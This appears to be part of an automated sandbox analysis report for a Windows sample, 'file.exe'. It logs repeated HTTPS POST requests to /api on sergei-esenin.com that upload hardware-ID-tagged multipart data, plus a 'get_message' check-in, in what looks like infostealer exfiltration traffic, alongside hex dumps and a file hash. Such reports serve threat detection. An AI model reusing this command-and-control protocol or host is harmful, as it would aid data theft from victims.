                                                                                                                                                                                Data Ascii: PmPCLr+fNiBLCM/T1CraVWI9R5m/lVUeQj2eNvdEc1RhK5Utv4k2YQhCjZuXOMhSBFM7xezDBV5SDNs7sBJ9TDwljQa/mTYZRRCH3cxu/hY0YxLU+4ssSRYn1z/1fDgYNCWbf/mRLnZFEJuM1HabR2E4RpW6lB0ACWLGb+8AfUwhJY1/uNJkNA1TiZ7TEPUWLGAayev4PGAdI9Mh9WMlASNm0DjB73ghH1eRm5RuhVU1LU37qo5CcV5iyG/vEgY
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 6e 48 6d 6b 57 42 6d 55 77 4c 52 33 59 5a 75 6b 31 56 39 62 67 66 51 37 4d 55 55 54 56 63 63 37 67 69 35 56 54 49 61 49 32 6a 5a 48 76 7a 41 66 42 67 31 52 5a 79 54 6d 69 6e 64 42 48 6f 6a 56 63 32 71 6e 6a 73 4f 57 47 4c 76 59 66 64 4b 63 31 52 7a 55 4e 59 78 38 64 5a 67 4e 30 5a 33 6b 5a 71 56 4f 4e 73 59 4e 6b 77 57 30 2b 43 47 54 41 34 57 59 6f 68 39 2b 52 49 33 48 58 4d 39 68 57 32 6b 68 43 56 78 57 77 4b 41 30 34 31 75 33 56 56 69 50 31 75 43 2b 49 5a 61 44 6c 63 68 77 6a 32 78 55 53 55 50 64 46 76 72 47 75 6a 53 5a 69 41 49 62 71 47 32 6d 43 6a 4d 44 7a 31 72 4d 2b 4b 71 69 45 4a 42 55 48 72 70 62 2f 38 53 44 45 4a 7a 66 5a 56 6e 76 2b 52 31 4b 41 56 58 69 59 7a 5a 43 39 77 57 4b 6d 73 57 67 71 53 47 42 41 35 49 63 70 35 76 73 30 4e 7a 56 47 4d 33
                                                                                                                                                                                Data Ascii: nHmkWBmUwLR3YZuk1V9bgfQ7MUUTVcc7gi5VTIaI2jZHvzAfBg1RZyTmindBHojVc2qnjsOWGLvYfdKc1RzUNYx8dZgN0Z3kZqVONsYNkwW0+CGTA4WYoh9+RI3HXM9hW2khCVxWwKA041u3VViP1uC+IZaDlchwj2xUSUPdFvrGujSZiAIbqG2mCjMDz1rM+KqiEJBUHrpb/8SDEJzfZVnv+R1KAVXiYzZC9wWKmsWgqSGBA5Icp5vs0NzVGM3


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.4 | 49733       | 104.21.53.84   | 443              | 7436 | C:\Users\user\Desktop\file.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-20 06:39:05 UTC | 372               | OUT       | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18168
Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                2024-10-20 06:39:05 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                                                                                                                                                                                Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.4 | 49734       | 104.21.53.84   | 443              | 7436 | C:\Users\user\Desktop\file.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-20 06:39:07 UTC | 371               | OUT       | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8789
Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:07 UTC8789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.4 | 49735       | 104.21.53.84   | 443              | 7436 | C:\Users\user\Desktop\file.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-20 06:39:08 UTC | 372               | OUT       | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20442
Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                2024-10-20 06:39:08 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                                                                                                                Data Ascii: `M?lrQMn 64F6(X&7~`


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.4 | 49736       | 104.21.53.84   | 443              | 7436 | C:\Users\user\Desktop\file.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-20 06:39:10 UTC | 371               | OUT       | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1245
Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:10 UTC1245OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.4 | 49737       | 104.21.53.84   | 443              | 7436 | C:\Users\user\Desktop\file.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-20 06:39:12 UTC | 373               | OUT       | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 586556
Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 45 eb 2b 77 63 33 44 62 ad 6f 4a 14 2a 64 a1 e7 d0 be bc af a4 6c 84 53 bf 39 24 b0 7e 9a ab 32 53 be 6e 17 b7 f7 4e 50 d3 c7 64 36 a4 c3 2c 73 57 56 b6 77 d3 2d 90 40 98 45 8e 30 02 06 11 74 6b 4c 2a c3 aa 40 82 f9 4b b2 7d f9 b0 df e2 b7 70 64 e9 88 fa ba ea a7 80 8e 0a a0 31 ca eb 95 d2 84 b8 ad ba d4 d9 e4 76 21 a5 51 9f d5 6a ed 26 5b 57 de 36 aa 0c 55 3a 1d f6 62 0b 4e 19 c5 af 1f da 33 de 4a 36 78 5b 99 44 3a 7d e9 79 05 37 af 05 05 0a 0e ed 3b 49 c9 5f b6 77 a6 4b 42 77 f4 0a df 81 a5 0e 09 15 5f 2c 30 16 53 0e 69 cb f0 6f fa 5d fa 4c ee 03 27 e1 84 19 32 f1 ca 39 dd 8e 23 d1 3a 70 4d c0 cd a1 9a 9a 60 3d 9f 3f e4 ed 2a 89 8c bf 4a 3a 08 f4 eb d1 94 bb 10 39 a3 11 6e 92 04 e9 8e 3c 80 7f 83 77 a9 80 8b 65 b8 7b ee ec 46 cf 3e c4 76 c7 23 4a 30 3b
                                                                                                                                                                                Data Ascii: E+wc3DboJ*dlS9$~2SnNPd6,sWVw-@E0tkL*@K}pd1v!Qj&[W6U:bN3J6x[D:}y7;I_wKBw_,0Sio]L'29#:pM`=?*J:9n<we{F>v#J0;


Session ID: 8
Source IP: 192.168.2.4
Source Port: 49739
Destination IP: 104.21.53.84
Destination Port: 443
PID: 7436
Process: C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-20 06:39:17 UTC | 354 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 87
Host: sergei-esenin.com
2024-10-20 06:39:17 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45
Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=9A99A18F001ECEAC88AF5E6FA2DF25FE


Target ID: 0
Start time: 02:38:57
Start date: 20/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x4d0000
File size: 3'058'688 bytes
MD5 hash: AE7FDA647DF94FB9207204A517856151
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

No disassembly